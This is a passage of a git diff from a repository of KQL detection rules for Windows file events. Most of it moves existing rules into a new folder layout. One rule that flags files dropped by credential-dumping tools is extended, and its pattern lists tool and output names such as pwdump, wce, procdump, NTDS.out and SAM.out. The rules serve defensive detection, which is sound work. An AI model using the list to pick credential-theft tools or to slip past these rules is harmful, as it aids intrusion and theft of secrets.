Access/cred_dump_tools_dropped_files.kql +++ b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql @@ -9,4 +9,4 @@ // - Legitimate Administrator using tool for password recovery DeviceFileEvents -| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file +| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql similarity index 100% rename from KQL/rules/Execution/csexec_service_file_creation.kql rename to KQL/rules/windows/file/file_event/csexec_service_file_creation.kql diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql similarity index 100% rename from KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql rename to KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql similarity index 100% rename from KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql rename to KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql rename to KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql similarity index 100% rename from KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql rename to KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql rename to KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql rename to KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql similarity index 100% rename from KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql rename to KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql rename to KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql rename to KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql similarity index 100% rename from KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql rename to KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql similarity index 100% rename from KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql rename to KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql rename to KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql rename to KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql rename to KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql rename to KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql rename to KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql rename to KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql rename to KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql similarity index 100% rename from KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql rename to KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql rename to KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql rename to KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql rename to KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql rename to KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql similarity index 100% rename from KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql rename to KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql similarity index 100% rename from KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql rename to KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql similarity index 100% rename from KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql rename to KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql similarity index 100% rename from KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql rename to KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql similarity index 100% rename from KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql similarity index 100% rename from KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql similarity index 100% rename from KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/livekd_driver_creation.kql rename to KQL/rules/windows/file/file_event/livekd_driver_creation.kql diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql rename to KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql similarity index 100% rename from KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql rename to KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql rename to KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql rename to KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_process_memory_dump_files.kql rename to KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql similarity index 100% rename from KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql rename to KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql similarity index 100% rename from KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql rename to KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql rename to KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_outlook_macro_created.kql rename to KQL/rules/windows/file/file_event/new_outlook_macro_created.kql diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/windows/file/file_event/ntds_dit_created.kql similarity index 100% rename from KQL/rules/Credential Access/ntds_dit_created.kql rename to KQL/rules/windows/file/file_event/ntds_dit_created.kql diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql similarity index 100% rename from KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql rename to KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql similarity index 100% rename from KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql rename to KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql similarity index 100% rename from KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql rename to KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql similarity index 100% rename from KQL/rules/Initial Access/octopus_scanner_malware.kql rename to KQL/rules/windows/file/file_event/octopus_scanner_malware.kql diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql similarity index 100% rename from KQL/rules/Initial Access/office_macro_file_creation.kql rename to KQL/rules/windows/file/file_event/office_macro_file_creation.kql diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql similarity index 100% rename from KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql rename to KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/windows/file/file_event/office_macro_file_download.kql similarity index 100% rename from KQL/rules/Initial Access/office_macro_file_download.kql rename to KQL/rules/windows/file/file_event/office_macro_file_download.kql diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql rename to KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql similarity index 100% rename from KQL/rules/Execution/pcre_net_package_temp_files.kql rename to KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql rename to KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql similarity index 100% rename from KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql rename to KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql rename to KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql similarity index 100% rename from KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql rename to KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql rename to KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql rename to KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql rename to KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql rename to KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql rename to KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql rename to KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql rename to KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql similarity index 100% rename from KQL/rules/Persistence/potential_persistence_via_outlook_form.kql rename to KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql rename to KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql rename to KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql similarity index 100% rename from KQL/rules/Credential Access/potential_sam_database_dump.kql rename to KQL/rules/windows/file/file_event/potential_sam_database_dump.kql diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql rename to KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql similarity index 100% rename from KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql rename to KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql similarity index 100% rename from KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql rename to KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql rename to KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql rename to KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql rename to KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql similarity index 100% rename from KQL/rules/Persistence/powershell_module_file_created.kql rename to KQL/rules/windows/file/file_event/powershell_module_file_created.kql diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql similarity index 100% rename from KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql rename to KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql similarity index 100% rename from KQL/rules/Persistence/powershell_profile_modification.kql rename to KQL/rules/windows/file/file_event/powershell_profile_modification.kql diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql similarity index 100% rename from KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql rename to KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql similarity index 100% rename from KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql rename to KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql similarity index 100% rename from KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql rename to KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql similarity index 100% rename from KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql rename to KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql similarity index 100% rename from KQL/rules/Execution/psexec_service_file_creation.kql rename to KQL/rules/windows/file/file_event/psexec_service_file_creation.kql diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql rename to KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql rename to KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql similarity index 100% rename from KQL/rules/Exfiltration/rclone_config_file_creation.kql rename to KQL/rules/windows/file/file_event/rclone_config_file_creation.kql diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql similarity index 100% rename from KQL/rules/Execution/remcom_service_file_creation.kql rename to KQL/rules/windows/file/file_event/remcom_service_file_creation.kql diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql similarity index 100% rename from KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql rename to 